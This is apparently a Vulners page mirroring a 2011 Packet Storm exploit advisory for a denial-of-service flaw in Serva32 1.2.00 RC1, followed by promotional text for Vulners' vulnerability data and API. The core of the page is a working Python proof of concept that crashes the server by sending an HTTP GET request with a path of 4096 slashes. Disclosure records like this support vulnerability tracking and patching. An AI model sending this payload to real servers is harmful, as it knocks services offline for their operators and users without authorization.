Lucene search
K

Serva32 1.2.00 RC1 Denial Of Service

🗓️ 09 May 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Serva32 1.2.00 RC1 Denial Of Service vulnerability cras

Code
`# ------------------------------------------------------------------------  
# Software................Serva32 1.2.00 RC1  
# Vulnerability...........Denial Of Service  
# Threat Level............Serious (3/5)  
# Download................http://www.vercot.com/~serva/  
# Discovery Date..........5/7/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <[email protected]>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A denial of service vulnerability can be exploited to crash Serva32  
# 1.2.00 RC1.  
#   
#   
# --PoC--  
  
import socket  
  
host = 'localhost'  
port = 80  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.settimeout(8)   
  
s.send('GET ' + '/' * 4096 + ' HTTP/1.1\r\n'  
'Host: localhost\r\n\r\n')  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation